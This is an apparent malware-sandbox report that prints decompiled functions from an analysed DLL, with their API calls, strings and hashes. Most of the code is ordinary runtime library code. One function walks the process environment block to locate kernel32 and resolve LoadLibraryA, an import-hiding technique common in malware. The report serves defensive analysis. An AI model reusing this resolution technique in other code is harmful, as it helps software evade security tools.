Opcode ID: bdf2bff44fedb95459b57ec19c1413db7c72c2c85e8b25c768b2b37574e95dfc
Instruction ID: 4379d27cb7055d54488a1f4e0907d7e99959702ae60cf3d104b3b67b57c1cd93
Opcode Fuzzy Hash: bdf2bff44fedb95459b57ec19c1413db7c72c2c85e8b25c768b2b37574e95dfc
Instruction Fuzzy Hash: 8B3105B5D052199BDF11DFA4D989BCDBBB8AF08304F1040EAE50DAB250EB709A888F54

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E9CF7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E9E9CF7(intOrPtr* __ecx, void* __eflags) {
				intOrPtr* _t13;

				_t13 = __ecx;
				E6E9E9D4A(__ecx);
				 *__ecx = 0x38;
				 *((intOrPtr*)(__ecx + 8)) = 0x6e9e0000;
				 *((intOrPtr*)(__ecx + 4)) = 0x6e9e0000;
				 *((intOrPtr*)(__ecx + 0xc)) = 0xe00;
				 *((intOrPtr*)(__ecx + 0x10)) = 0x6e9f53dc;
				if(E6E9E5D50(__ecx + 0x14) < 0) {
					if(IsDebuggerPresent() != 0) {
						OutputDebugStringW(L"ERROR : Unable to initialize critical section in CAtlBaseModule\n");
					}
					 *0x6e9fcb28 = 1;
				}
				return _t13;
			}

0x6e9e9cf8
0x6e9e9cfa
0x6e9e9d04
0x6e9e9d0d
0x6e9e9d10
0x6e9e9d13
0x6e9e9d1a
0x6e9e9d28
0x6e9e9d32
0x6e9e9d39
0x6e9e9d39
0x6e9e9d3f
0x6e9e9d3f
0x6e9e9d49

APIs

Part of subcall function 6E9E5D50: GetLastError.KERNEL32(?,?,?,6E9FA66C), ref: 6E9E5D74

IsDebuggerPresent.KERNEL32(?,?,6E9FA66C,?,?,?,?,?,?,?,00000000,?,6E9F46B0,000000FF,?,6E9E1E0A), ref: 6E9E9D2A
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,6E9FA66C,?,?,?,?,?,?,?,00000000,?,6E9F46B0,000000FF), ref: 6E9E9D39

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 6E9E9D34

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: DebugDebuggerErrorLastOutputPresentString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 389471666-631824599
Opcode ID: 56b374313c801ba88106d29ce0fb28828afe02c9e103f65152f013a778935887
Instruction ID: a00d1194fd87c407e007267839a63698ac295e5356b9c317b55cfb9c48d84ea3
Opcode Fuzzy Hash: 56b374313c801ba88106d29ce0fb28828afe02c9e103f65152f013a778935887
Instruction Fuzzy Hash: 67E039B0114711CAD3229FA8E4047827AE4AF06315F04885CE95ACAA00EBB0D889CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EC0A3 Relevance: 4.6, APIs: 3, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 81%

			E6E9EC0A3(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, char _a4, char _a8, char _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x6e9fc024; // 0xd7674204
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E6E9E9954(_t41);
					_pop(_t61);
				}
				E6E9EA330(_t66,  &_v804, 0, 0x50);
				E6E9EA330(_t66,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_t23 =  &_v0; // 0x6e9fcd24
				_v540 =  *_t23;
				_t25 =  &_v0; // 0x6e9e4f85
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_t28 = _t49 - 4; // 0xb804c483
				_v544 =  *_t28;
				_t30 =  &_a8; // 0x55cccccc
				_v804 =  *_t30;
				_t32 =  &_a12; // 0xec83ec8b
				_v800 =  *_t32;
				_t34 =  &_v0; // 0x6e9fcd24
				_v792 =  *_t34;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // 0x6e9e4c59
				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_t38 =  &_a4; // 0xc35de58b
					_push( *_t38);
					_t57 = E6E9E9954(_t57);
				}
				_t39 =  &_v8; // 0x41d2
				return E6E9E9ADF(_t57, _t60,  *_t39 ^ _t69, _t65, _t67, _t68);
			}

0x6e9ec0a3
0x6e9ec0a3
0x6e9ec0a3
0x6e9ec0ae
0x6e9ec0b3
0x6e9ec0b5
0x6e9ec0bd
0x6e9ec0bf
0x6e9ec0c2
0x6e9ec0c7
0x6e9ec0c7
0x6e9ec0d3
0x6e9ec0e6
0x6e9ec0f4
0x6e9ec0fa
0x6e9ec100
0x6e9ec106
0x6e9ec10c
0x6e9ec112
0x6e9ec118
0x6e9ec11e
0x6e9ec124
0x6e9ec12a
0x6e9ec131
0x6e9ec138
0x6e9ec13f
0x6e9ec146
0x6e9ec14d
0x6e9ec154
0x6e9ec155
0x6e9ec15b
0x6e9ec15e
0x6e9ec164
0x6e9ec164
0x6e9ec167
0x6e9ec16d
0x6e9ec177
0x6e9ec17a
0x6e9ec180
0x6e9ec183
0x6e9ec189
0x6e9ec18c
0x6e9ec192
0x6e9ec195
0x6e9ec1a3
0x6e9ec1a5
0x6e9ec1ab
0x6e9ec1ba
0x6e9ec1c6
0x6e9ec1c6
0x6e9ec1c9
0x6e9ec1ce
0x6e9ec1cf
0x6e9ec1db

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6E9EC19B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6E9EC1A5
UnhandledExceptionFilter.KERNEL32(6E9E4C59,?,?,?,?,?,?), ref: 6E9EC1B2

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: af47a0ff78d8b7904cae9d76f296d2cf6ac6508ba34339cda8bfa863807f4a04
Instruction ID: 799548de309bab89fcb77cd075c75e19c3092dffc70484bd4b9240d3c0e7f296
Opcode Fuzzy Hash: af47a0ff78d8b7904cae9d76f296d2cf6ac6508ba34339cda8bfa863807f4a04
Instruction Fuzzy Hash: 2D310671901329ABCB61DF64D888BCDBBB8BF18310F5041DAE51CAB250E7709F858F44

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EC865 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6E9EC865(int _a4) {
				void* _t14;

				if(E6E9EE9B4(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E6E9EC8EA(_t14, _a4);
				ExitProcess(_a4);
			}

0x6e9ec872
0x6e9ec88e
0x6e9ec88e
0x6e9ec897
0x6e9ec8a0

APIs

GetCurrentProcess.KERNEL32(?,?,6E9EC864,?,00000001,?,?), ref: 6E9EC887
TerminateProcess.KERNEL32(00000000,?,6E9EC864,?,00000001,?,?), ref: 6E9EC88E
ExitProcess.KERNEL32 ref: 6E9EC8A0

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 4e76e5e6924bc1bc8a31ad3c488db971cccdd878e9bf1234810bb6f98c2bae6d
Instruction ID: 024b2e953991d1b603c5d15b845cab8bb2f5d94298a8a3a0d994e32bf42a8700
Opcode Fuzzy Hash: 4e76e5e6924bc1bc8a31ad3c488db971cccdd878e9bf1234810bb6f98c2bae6d
Instruction Fuzzy Hash: BDE0B631414988AFCF426B94DA58A983FADFF81645B054824FA4A8A520EB39ED51DEC4

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E1490 Relevance: 2.6, Strings: 2, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E9E1490(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v5;
				intOrPtr* _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _t44;

				_v24 = 0xc;
				_v32 = 0x10;
				_v36 = 0x10;
				_v20 =  *[fs:0x30];
				_v28 =  *((intOrPtr*)(_v20 + _v24));
				_v16 =  *((intOrPtr*)(_v28 + _v32));
				_v56 =  *((intOrPtr*)(_v16 + _v36));
				_v12 = _v16;
				while(1) {
					_v12 =  *_v12;
					_t44 = _v12;
					_t75 =  *((intOrPtr*)(_t44 + 0x18));
					if( *((intOrPtr*)(_t44 + 0x18)) != 0 && E6E9E1270( &_v5, _t75, _v12 + 0x30, L"kernel32.dll") == 0) {
						break;
					}
					__eflags = _v16 - _v12;
					if(__eflags != 0) {
						continue;
					}
					L5:
					_v44 =  *((intOrPtr*)(_v12 + 0x18));
					_v40 = E6E9E8C90("LoadLibraryA", 0xc, 0xa);
					 *0x6e9fc958 = E6E9E1640(_v44, _v40, 0xc, 0xa);
					_v48 = E6E9E1580(_a8, _a8);
					_v52 = E6E9E1640(_v48, _a4, _a12, _a16);
					return _v52;
				}
				goto L5;
			}

0x6e9e1496
0x6e9e149d
0x6e9e14a4
0x6e9e14b1
0x6e9e14bc
0x6e9e14c7
0x6e9e14d2
0x6e9e14d8
0x6e9e14db
0x6e9e14e9
0x6e9e14ec
0x6e9e14ef
0x6e9e14f3
0x00000000
0x00000000
0x6e9e1512
0x6e9e1515
0x00000000
0x00000000
0x6e9e1517
0x6e9e151d
0x6e9e152e
0x6e9e1542
0x6e9e1550
0x6e9e1568
0x6e9e1571
0x6e9e1571
0x00000000

Strings

LoadLibraryA, xrefs: 6E9E1524
kernel32.dll, xrefs: 6E9E14F5

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID:
String ID: LoadLibraryA$kernel32.dll
API String ID: 0-2572683754
Opcode ID: 160f1a22af0d27670abfc6bde6b13eda3a8e8a2831bb645dd0b47e84f29fa563
Instruction ID: 4fc653c7700c868fe6510c35324a37f74eb8e52a94f946b1cbaef3543aad64b4
Opcode Fuzzy Hash: 160f1a22af0d27670abfc6bde6b13eda3a8e8a2831bb645dd0b47e84f29fa563
Instruction Fuzzy Hash: AF31C374E00208EFDB04CFD9C880AEEBBB5BF89304F108559E615AB754D730AA45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F3EB6 Relevance: 1.8, APIs: 1, Instructions: 274
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E6E9F3EB6(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed char _t193;
				signed int _t196;
				signed int _t200;
				signed int _t203;
				void* _t204;
				void* _t207;
				signed int _t210;
				void* _t211;
				signed int _t226;
				unsigned int* _t241;
				signed char _t243;
				signed int* _t251;
				unsigned int* _t257;
				signed int* _t258;
				signed char _t260;
				long _t263;
				signed int* _t266;

				 *(_a4 + 4) = 0;
				_t263 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t243 = _a12;
				if((_t243 & 0x00000010) != 0) {
					_t263 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t243 & 0x00000002) != 0) {
					_t263 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t243 & 0x00000001) != 0) {
					_t263 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t243 & 0x00000004) != 0) {
					_t263 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t243 & 0x00000008) != 0) {
					_t263 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t266 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
				_t260 = E6E9F38E5(_a4);
				if((_t260 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t260 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t260 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t260 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t260 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t266 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffd | 1;
						L26:
						 *_t258 = _t226;
						L29:
						_t175 =  *_t266 & 0x00000300;
						if(_t175 == 0) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
							L35:
							 *_t251 = _t178;
							L36:
							_t179 = _a4;
							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t255 = _a4;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t241;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t241;
							}
							E6E9F3851(_t255);
							RaiseException(_t263, 0, 1,  &_a4);
							_t257 = _a4;
							_t193 = _t257[2];
							if((_t193 & 0x00000010) != 0) {
								 *_t266 =  *_t266 & 0xfffffffe;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000008) != 0) {
								 *_t266 =  *_t266 & 0xfffffffb;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000004) != 0) {
								 *_t266 =  *_t266 & 0xfffffff7;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000002) != 0) {
								 *_t266 =  *_t266 & 0xffffffef;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000001) != 0) {
								 *_t266 =  *_t266 & 0xffffffdf;
							}
							_t196 =  *_t257 & 0x00000003;
							if(_t196 == 0) {
								 *_t266 =  *_t266 & 0xfffff3ff;
							} else {
								_t207 = _t196 - 1;
								if(_t207 == 0) {
									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t266 = _t210;
									L58:
									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
									if(_t200 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t266 = _t203;
										L65:
										if(_a28 == 0) {
											 *_t241 = _t257[0x14];
										} else {
											 *_t241 = _t257[0x14];
										}
										return _t203;
									}
									_t204 = _t200 - 1;
									if(_t204 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t203 = _t204 - 1;
									if(_t203 == 0) {
										 *_t266 =  *_t266 & 0xfffff3ff;
									}
									goto L65;
								}
								_t211 = _t207 - 1;
								if(_t211 == 0) {
									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t211 == 1) {
									 *_t266 =  *_t266 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x6e9f3ec4
0x6e9f3ecb
0x6e9f3ed0
0x6e9f3ed6
0x6e9f3ed9
0x6e9f3edf
0x6e9f3ee4
0x6e9f3ee9
0x6e9f3ee9
0x6e9f3eef
0x6e9f3ef4
0x6e9f3ef9
0x6e9f3ef9
0x6e9f3f00
0x6e9f3f05
0x6e9f3f0a
0x6e9f3f0a
0x6e9f3f11
0x6e9f3f16
0x6e9f3f1b
0x6e9f3f1b
0x6e9f3f22
0x6e9f3f27
0x6e9f3f2c
0x6e9f3f2c
0x6e9f3f34
0x6e9f3f44
0x6e9f3f56
0x6e9f3f68
0x6e9f3f7b
0x6e9f3f8d
0x6e9f3f95
0x6e9f3f9a
0x6e9f3f9f
0x6e9f3f9f
0x6e9f3fa6
0x6e9f3fab
0x6e9f3fab
0x6e9f3fb2
0x6e9f3fb7
0x6e9f3fb7
0x6e9f3fbe
0x6e9f3fc3
0x6e9f3fc3
0x6e9f3fca
0x6e9f3fcf
0x6e9f3fcf
0x6e9f3fd9
0x6e9f3fdb
0x6e9f4015
0x6e9f3fdd
0x6e9f3fe2
0x6e9f4006
0x6e9f400e
0x6e9f4002
0x6e9f4002
0x6e9f4018
0x6e9f401f
0x6e9f4021
0x6e9f4043
0x6e9f404b
0x6e9f404e
0x6e9f404e
0x6e9f4050
0x6e9f4050
0x6e9f405b
0x6e9f4061
0x6e9f4066
0x6e9f406d
0x6e9f40a7
0x6e9f40b2
0x6e9f40b8
0x6e9f40bb
0x6e9f40be
0x6e9f40ca
0x6e9f40d2
0x6e9f406f
0x6e9f4072
0x6e9f407e
0x6e9f4084
0x6e9f408a
0x6e9f408d
0x6e9f4096
0x6e9f4096
0x6e9f40d5
0x6e9f40e3
0x6e9f40e9
0x6e9f40ec
0x6e9f40f1
0x6e9f40f3
0x6e9f40f6
0x6e9f40f6
0x6e9f40fb
0x6e9f40fd
0x6e9f4100
0x6e9f4100
0x6e9f4105
0x6e9f4107
0x6e9f410a
0x6e9f410a
0x6e9f410f
0x6e9f4111
0x6e9f4114
0x6e9f4114
0x6e9f4119
0x6e9f411b
0x6e9f411b
0x6e9f4128
0x6e9f412b
0x6e9f4162
0x6e9f412d
0x6e9f412d
0x6e9f4130
0x6e9f415b
0x6e9f4150
0x6e9f4150
0x6e9f4164
0x6e9f416c
0x6e9f416f
0x6e9f418e
0x6e9f4193
0x6e9f4193
0x6e9f4195
0x6e9f419a
0x6e9f41a6
0x6e9f419c
0x6e9f419f
0x6e9f419f
0x6e9f41ab
0x6e9f41ab
0x6e9f4171
0x6e9f4174
0x6e9f4183
0x00000000
0x6e9f4183
0x6e9f4176
0x6e9f4179
0x6e9f417b
0x6e9f417b
0x00000000
0x6e9f4179
0x6e9f4132
0x6e9f4135
0x6e9f414b
0x00000000
0x6e9f414b
0x6e9f413a
0x6e9f413c
0x6e9f413c
0x6e9f413a
0x00000000
0x6e9f412b
0x6e9f4028
0x6e9f4036
0x6e9f403e
0x00000000
0x6e9f403e
0x6e9f402c
0x6e9f4031
0x6e9f4031
0x00000000
0x6e9f402c
0x6e9f3fe9
0x6e9f3ff7
0x6e9f3fff
0x00000000
0x6e9f3fff
0x6e9f3fed
0x6e9f3ff2
0x6e9f3ff2
0x6e9f3fed

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E9F3EB1,?,?,00000008,?,?,6E9F3B49,00000000), ref: 6E9F40E3

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 18db988838531f9f93388b7ebc2c987d74febbe3873d3a42121421e94759637c
Instruction ID: 24c820608a1bb22c66f8b19d4a1f62b62d5694c93de46927e96c7c6a903bc548
Opcode Fuzzy Hash: 18db988838531f9f93388b7ebc2c987d74febbe3873d3a42121421e94759637c
Instruction Fuzzy Hash: EAB17971220609DFEB04CF68C596B957BA0FF55364F258658E8A9CF2A1C336E993CF40

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E9658 Relevance: 1.6, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E6E9E9658(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t99;
				signed int _t104;

				_t90 = __edx;
				 *0x6e9fcff0 =  *0x6e9fcff0 & 0x00000000;
				 *0x6e9fc010 =  *0x6e9fc010 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v12 = _v28 ^ 0x49656e69;
				_v8 = _v36 ^ 0x756e6547;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v32 ^ 0x6c65746e | _v12) != 0) {
					L9:
					_t96 =  *0x6e9fcff4; // 0x2
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0x6e9fcff4 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0x6e9fc010; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0x6e9fcff0 = 1;
					 *0x6e9fc010 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0x6e9fcff0 = 2;
						 *0x6e9fc010 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0x6e9fc010; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0x6e9fcff0 = 3;
								 *0x6e9fc010 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0x6e9fcff0 = 5;
									 *0x6e9fc010 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0x6e9fc010 =  *0x6e9fc010 | 0x00000040;
										 *0x6e9fcff0 = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t99 =  *0x6e9fcff4; // 0x2
					_t96 = _t99 | 0x00000001;
					 *0x6e9fcff4 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}

0x6e9e9658
0x6e9e965b
0x6e9e9665
0x6e9e9676
0x6e9e9825
0x6e9e9828
0x6e9e9828
0x6e9e967c
0x6e9e9682
0x6e9e9687
0x6e9e968b
0x6e9e968f
0x6e9e9690
0x6e9e9692
0x6e9e9695
0x6e9e969a
0x6e9e96a3
0x6e9e96b4
0x6e9e96bf
0x6e9e96c5
0x6e9e96c6
0x6e9e96cb
0x6e9e96ce
0x6e9e96d3
0x6e9e96db
0x6e9e96de
0x6e9e96e1
0x6e9e9726
0x6e9e9726
0x6e9e972c
0x6e9e972c
0x6e9e9731
0x6e9e9732
0x6e9e9738
0x6e9e9769
0x6e9e973a
0x6e9e973c
0x6e9e973d
